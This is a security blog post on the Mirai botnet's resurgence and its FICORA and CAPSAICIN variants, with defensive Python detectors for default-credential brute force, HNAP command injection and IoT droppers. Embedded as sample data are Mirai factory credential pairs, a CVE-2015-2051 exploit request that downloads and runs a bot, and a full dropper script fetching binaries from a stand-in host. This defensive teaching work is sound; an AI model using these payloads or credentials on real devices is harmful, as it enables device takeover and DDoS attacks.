Image generated by DALLE-3
Mirai Botnet Variant Resurgence
Nicholas Howland, December 27th 2024
A couple of headlines about a resurgence of the Mirai botnet caught my eye, so for my last post of the year I wanted to look at a few of those articles. Along the way I ended up uncovering some much older posts about botnets, which are well worth a read if you want a few tidbits about the history of the different variants. Vincent Li's article [8] is especially helpful if you need IOCs for threat hunting in your environment.
Before we get to the botnets
I wanted to share some good news for healthcare security. The HHS Office for Civil Rights has published a proposal to update the HIPAA Security Rule, with the aim of improving cybersecurity and better protecting healthcare organizations. The Security Rule was last updated in 2013, so a refresh should reduce risk to patients and providers alike, not only from botnets but from ransomware, data breaches and the rest of the usual nastiness.
The full press release by HHS can be found here: https://www.hhs.gov/about/news/2024/12/27/hhs-office-civil-rights-proposes-measures-strengthen-cybersecurity-health-care-under-hipaa.html
What is Mirai
Mirai first appeared in 2016, and Brian Krebs's January 18th, 2017 blog post [1] identified Paras Jha and Josiah White, who ran a company called Protraf Solutions, as its authors. Their business model was straight racketeering: hit companies with the botnet, then offer to sell them DDoS mitigation [2]. Mirai has several ways of denying a victim's service: UDP floods, query floods against the DNS servers that resolve names for the victim's resources, SYN floods, a Simple Text Oriented Messaging Protocol (STOMP) flood that completes a TCP handshake before sending junk so that it passes filters that only drop half-open connections, GRE-encapsulated floods (GRE IP and GRE Ethernet), and HTTP floods [3].
How does Mirai work
Mirai compromises devices that are reachable from the open internet and still use default credentials: its scanner connects to telnet (port 23, and sometimes 2323) and tries a hard-coded dictionary of a few dozen factory username/password pairs. Once it gets a shell, it reports the device to a loader, which installs the bot binary built for that device's architecture. The installed bot then takes orders from a command and control server: either scan for more vulnerable devices (the Cloudflare glossary [2] singles out devices running the ARC processor, but the leaked source cross-compiles for many embedded Linux architectures) or perform DDoS attacks.
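The infection step above is easy to spot on the defender's side because the credential dictionary is fixed and the scanner tries pairs from it in quick succession. The following is an added example (mine, not from the original post or the Mirai source) that runs that detection over a constructed telnet login log. The log format, the IP addresses and the 60-second window are assumptions for the example; the credential pairs are a small subset of the publicly known Mirai dictionary.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Small subset of the username/password pairs hard-coded in the leaked
# Mirai source (the full list has a few dozen entries).
MIRAI_DEFAULT_CREDS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"),
    ("admin", "admin"), ("root", "888888"), ("root", "default"),
    ("root", "juantech"), ("root", "123456"), ("root", "54321"),
    ("support", "support"), ("admin", "password"), ("root", "root"),
}

# Constructed log format for this example (not any real product's format):
#   <ISO8601 UTC> telnetd: login from <ip> user=<u> pass=<p> result=<ok|fail>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) telnetd: login from (?P<ip>[\d.]+) "
    r"user=(?P<user>\S*) pass=(?P<pw>\S*) result=(?P<res>ok|fail)$"
)

# Constructed sample log: one Mirai-style scanner (203.0.113.5), one legitimate
# admin who mistyped once (198.51.100.7), and a slow single-try source (192.0.2.9).
SAMPLE_LOG = """\
2024-12-20T03:14:07Z telnetd: login from 203.0.113.5 user=root pass=xc3511 result=fail
2024-12-20T03:14:09Z telnetd: login from 203.0.113.5 user=root pass=vizxv result=fail
2024-12-20T03:14:11Z telnetd: login from 203.0.113.5 user=admin pass=admin result=ok
2024-12-20T03:20:00Z telnetd: login from 198.51.100.7 user=admin pass=admin result=fail
2024-12-20T03:20:05Z telnetd: login from 198.51.100.7 user=admin pass=Tr0ub4dor! result=ok
2024-12-20T01:00:00Z telnetd: login from 192.0.2.9 user=root pass=admin result=fail
2024-12-20T02:30:00Z telnetd: login from 192.0.2.9 user=root pass=xc3511 result=fail
""".splitlines()


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return d


def detect_mirai_bruteforce(lines, window_seconds=60, min_pairs=3):
    """Return {src_ip: sorted list of known-default pairs tried} for every source
    that tried at least `min_pairs` distinct Mirai dictionary pairs within any
    `window_seconds` interval. Only attempts using dictionary pairs count, so a
    user fat-fingering their own password does not trigger it."""
    events = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e and (e["user"], e["pw"]) in MIRAI_DEFAULT_CREDS:
            events[e["ip"]].append((e["ts"], (e["user"], e["pw"])))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):
            pairs = {p for t, p in evs[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(pairs) >= min_pairs:
                hits[ip] = sorted(pairs)
                break
    return hits


def default_credential_logins(lines):
    """Successful logins that used a dictionary pair: the device is effectively
    owned whether or not the rest of the brute force was seen."""
    out = []
    for line in lines:
        e = parse_line(line)
        if e and e["res"] == "ok" and (e["user"], e["pw"]) in MIRAI_DEFAULT_CREDS:
            out.append((e["ip"], e["user"], e["pw"]))
    return out


if __name__ == "__main__":
    print("brute force sources:", detect_mirai_bruteforce(SAMPLE_LOG))
    print("default-credential logins:", default_credential_logins(SAMPLE_LOG))
```

The second function is the one that matters operationally: a single successful login with a factory pair means the device should be pulled and re-imaged regardless of what else the scanner did.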
Usual Suspects
The Hacker News reported on December 19th 2024 that Juniper Networks, an enterprise network equipment vendor, had warned that customers were seeing anomalous behavior on Session Smart Router systems, which turned out to be infected with Mirai [4]. Juniper's own advisory is listed in the references [Juniper]. The infected devices were still using the default credentials, which is almost certainly how they were compromised in the first place.
Bleeping Computer reported on December 24th 2024 that a new botnet had begun exploiting vulnerabilities in DigiEver network video recorders (NVRs) and TP-Link routers [5]. NVRs are very often put straight onto the internet so owners can view their cameras remotely, which makes them one of the most commonly exposed services. A little over a month earlier, Bleeping Computer had reported that the Shadowserver Foundation observed a zero-day (CVE-2024-11120) in GeoVision NVR/video surveillance devices being exploited by a botnet to install Mirai [6]. The same article [5] noted that TP-Link routers running outdated firmware were being infected by the botnet as well.
Variants
The Hacker News reported [7] on a write-up from Fortinet's threat research team [8] describing two variants, FICORA and CAPSAICIN, that were spreading through vulnerable D-Link routers. Vincent Li explained in the Fortinet post: "These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings action on the HNAP (Home Network Administration Protocol) interface. This HNAP weakness was first exposed almost a decade ago, with numerous devices affected by a variety of CVE numbers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112."
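The oldest bug in that list, CVE-2015-2051, is a command injection: the firmware pastes the SOAPAction header of a request to /HNAP1/ into a shell command, so anything appended after the GetDeviceSettings action name gets executed. The following is an added example (mine, not code from the Fortinet post or from D-Link firmware) that shows both sides of that weakness: the allowlist check a fixed firmware should apply to the header, and a detection that flags exploitation attempts in captured requests. The captured requests, the documentation-range IP addresses, the `la.bot.mips` file name and the action allowlist are constructed assumptions for the example.

```python
import re

HNAP_NS = "http://purenetworks.com/HNAP1/"

# Action names a firmware should accept on /HNAP1/. Illustrative subset
# (assumption for this example); a real device has its own fixed list.
ALLOWED_ACTIONS = {"GetDeviceSettings", "Login", "GetWLanRadioSettings"}

# Characters that have no business in a SOAPAction value and that the known
# exploits rely on to break out of the shell command the header is pasted into.
SHELL_META = re.compile(r"[`;|&<>$\n\r]")

# Constructed captures (documentation IPs, not real traffic). The exploit
# request chains a download-and-run of a dropper through backticks.
EXPLOIT_REQUEST = (
    "POST /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/"
    "`cd /tmp; wget http://203.0.113.10/la.bot.mips; chmod +x la.bot.mips; ./la.bot.mips`\"\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

BENIGN_REQUEST = (
    "POST /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings\"\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_request(raw):
    """Minimal HTTP/1.1 request parser for captured text with CRLF line endings."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        # Only the first colon separates the name from the value; the value
        # itself (a URL) contains colons.
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def validate_soapaction(value):
    """Allowlist check a fixed firmware would apply: the header must be exactly
    the HNAP namespace followed by a known action name, nothing appended.
    Returns the action name, or None when the value must be rejected."""
    value = value.strip().strip('"')
    if not value.startswith(HNAP_NS):
        return None
    action = value[len(HNAP_NS):]
    return action if action in ALLOWED_ACTIONS else None


def is_hnap_injection_attempt(raw):
    """Detection-side view: flag requests to /HNAP1/ whose SOAPAction names
    GetDeviceSettings but carries shell metacharacters after it."""
    _method, path, headers, _body = parse_request(raw)
    if not path.lower().startswith("/hnap1"):
        return False
    soapaction = headers.get("soapaction", "")
    if validate_soapaction(soapaction) is not None:
        return False  # exactly a known action: the benign shape
    return "GetDeviceSettings" in soapaction and bool(SHELL_META.search(soapaction))


if __name__ == "__main__":
    print("exploit flagged:", is_hnap_injection_attempt(EXPLOIT_REQUEST))
    print("benign flagged:", is_hnap_injection_attempt(BENIGN_REQUEST))
```

The firmware-side fix is the allowlist, not the metacharacter filter: a denylist of shell characters is only a detection aid, because the header should never reach a shell at all.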
CAPSAICIN and FICORA operation
From Vincent Li's post: FICORA infects a device by downloading a shell script that uses wget, ftpget, curl and tftp to retrieve the bot binaries. The script kills off the processes of any other botnets that may already be running on the device, and once nothing is left to interfere it executes the downloaded binaries, which are built for many different architectures: "arc," "arm," "arm5," "arm6," "arm7," "i486," "i586," "i686," "m68k," "mips," "mipsel," "powerpc," "powerpc-440fp," and "sparc."
CAPSAICIN uses the same methodology as FICORA except that its binaries are prefixed with yakuza instead of la.bot. Vincent Li also remarked that CAPSAICIN appears to be a variant from the Keksec group, whose botnets were likewise known to target vulnerable routers and IoT devices, mainly Realtek and Linksys endpoints [9].
Just like Mirai, the credentials used to attack other vulnerable or reachable devices are hard-coded into the binary, and it carries several DDoS attack functions using UDP, TCP and DNS, again just like Mirai.
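The downloader script described above (fetch with whatever of wget/curl/tftp/ftpget the device has, kill competing bots, run one binary per architecture) is the most recognizable artifact these families leave behind, and the same shape covers both FICORA and CAPSAICIN since only the file prefix differs. The following is an added example (mine, not code from the Fortinet post or either botnet) that triages a shell script for those traits. The dropper and backup scripts it is run on are constructed for the example, as are the documentation-range IP, the `dvrHelper` process name and the scoring threshold; the architecture suffix list is the one quoted from the Fortinet write-up.

```python
import re

# Architecture suffixes quoted from the Fortinet write-up. Longer alternatives
# come first so "mipsel" is not reported as "mips".
ARCH_RE = r"arc|arm[567]?|i[456]86|m68k|mipsel|mips|powerpc-440fp|powerpc|sparc"
# <prefix>.<arch>, where the prefix is the family's file name (la.bot, yakuza, ...)
BINARY_RE = re.compile(r"(?P<prefix>[A-Za-z0-9_.-]+?)\.(?P<arch>" + ARCH_RE + r")(?![\w-])")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
KILL_RE = re.compile(r"\b(killall|pkill|kill)\b")
# chmod +x (or a mode with an execute bit) immediately followed by ./ on the same line
EXEC_RE = re.compile(r"chmod\s+(?:\+x|[0-7]*7[0-7]*)\s+\S+.*?;\s*\./")
SCRATCH_RE = re.compile(r"\bcd\s+/(?:tmp|var/run|dev/shm|mnt|var/tmp)\b")

# Constructed dropper in the shape the post describes (not a real sample).
SAMPLE_DROPPER = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
killall -9 dvrHelper x86 mips mipsel arm arm7 2>/dev/null
pkill -9 -f "\.mips" 2>/dev/null
wget http://203.0.113.10/la.bot.arm -O la.bot.arm || curl -O http://203.0.113.10/la.bot.arm; chmod +x la.bot.arm; ./la.bot.arm; rm -f la.bot.arm
wget http://203.0.113.10/la.bot.arm7 -O la.bot.arm7; chmod +x la.bot.arm7; ./la.bot.arm7; rm -f la.bot.arm7
tftp -g -r la.bot.mips 203.0.113.10; chmod 777 la.bot.mips; ./la.bot.mips; rm -f la.bot.mips
ftpget -u anonymous -p anonymous 203.0.113.10 la.bot.mipsel la.bot.mipsel; chmod +x la.bot.mipsel; ./la.bot.mipsel; rm -f la.bot.mipsel
"""

# Constructed benign script that also uses curl, to show the score is not
# triggered by a single downloader call.
BENIGN_SCRIPT = """#!/bin/sh
# nightly backup
cd /var/backups || exit 1
tar czf site-$(date +%F).tar.gz /srv/www
curl -T site-*.tar.gz https://backup.example.net/upload
"""


def triage_dropper(text):
    """Score a shell script for the traits of an IoT multi-architecture dropper.
    Returns the extracted file prefixes and architectures alongside the
    indicator booleans; the verdict requires at least four of five traits."""
    binaries = BINARY_RE.findall(text)  # list of (prefix, arch) tuples
    prefixes = {p for p, _ in binaries}
    arches = {a for _, a in binaries}
    indicators = {
        "uses_downloader": bool(DOWNLOADER_RE.search(text)),
        "multi_arch_payloads": len(arches) >= 2,
        "kills_other_processes": bool(KILL_RE.search(text)),
        "chmod_then_execute": bool(EXEC_RE.search(text)),
        "runs_from_scratch_dir": bool(SCRATCH_RE.search(text)),
    }
    return {
        "downloaders": set(DOWNLOADER_RE.findall(text)),
        "binary_prefixes": prefixes,
        "architectures": arches,
        "indicators": indicators,
        "likely_iot_dropper": sum(indicators.values()) >= 4,
    }


if __name__ == "__main__":
    for name, script in (("dropper", SAMPLE_DROPPER), ("backup", BENIGN_SCRIPT)):
        r = triage_dropper(script)
        print(name, r["likely_iot_dropper"], r["binary_prefixes"], sorted(r["architectures"]))
```

The extracted prefix is the useful pivot: once a script on one device shows `la.bot` or `yakuza`, every other device on the segment can be searched for the same names, and the download host becomes a block-list entry.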
Mitigations
A full list of Indicators of Compromise can be found at the bottom of the blogpost by Vincent Li, https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
There are a few things you can do to keep a botnet off your router or NVR. First, make it harder to infect: change the default administrator password before the device ever goes online, keep management interfaces off the internet entirely or, failing that, restrict them to a few trusted IP addresses, and apply firmware patches promptly. Retire devices whose vendor no longer ships patches; the HNAP bug above is nearly a decade old and is still being exploited because the hardware outlived its support.
If you are the victim of a DDoS attack, a DDoS mitigation/CDN provider such as Cloudflare is the practical answer: they sit in front of your origin, absorb volumetric traffic across their network, drop attack traffic before it reaches you, and alert you when an attack is under way. Unlike Paras Jha and Josiah White, they are not also the ones launching it.
References
[1] Brian Krebs, Krebs on Security, January 18, 2017, https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/
[2] Cloudflare, "What is the Mirai Botnet?", retrieved December 27, 2024, https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/
[3] Elizabeth Montalbano, Dark Reading, August 16, 2023, https://www.darkreading.com/cyberattacks-data-breaches/mirai-common-attack-methods-remain-consistent-effective
[4] Ravie Lakshmanan, The Hacker News, December 19, 2024, https://thehackernews.com/2024/12/juniper-warns-of-mirai-botnet-targeting.html
[Juniper] Juniper Networks Support, "2024-12 Reference Advisory: Session Smart Router: Mirai malware found on systems when the default password remains unchanged", created December 17, 2024, last updated December 23, 2024, https://supportportal.juniper.net/s/article/2024-12-Reference-Advisory-Session-Smart-Router-Mirai-malware-found-on-systems-when-the-default-password-remains-unchanged?language=en_US
[5] Bill Toulas, Bleeping Computer, December 24, 2024, https://www.bleepingcomputer.com/news/security/new-botnet-exploits-vulnerabilities-in-nvrs-tp-link-routers/
[6] Bill Toulas, Bleeping Computer, November 15, 2024, https://www.bleepingcomputer.com/news/security/botnet-exploits-geovision-zero-day-to-install-mirai-malware/
[7] Ravie Lakshmanan, The Hacker News, December 27, 2024, https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html
[8] Vincent Li, Fortinet, December 26, 2024, https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
[9] Tara Seals, Threatpost, May 19, 2021, https://threatpost.com/keksec-simps-botnet-gaming-ddos/166306/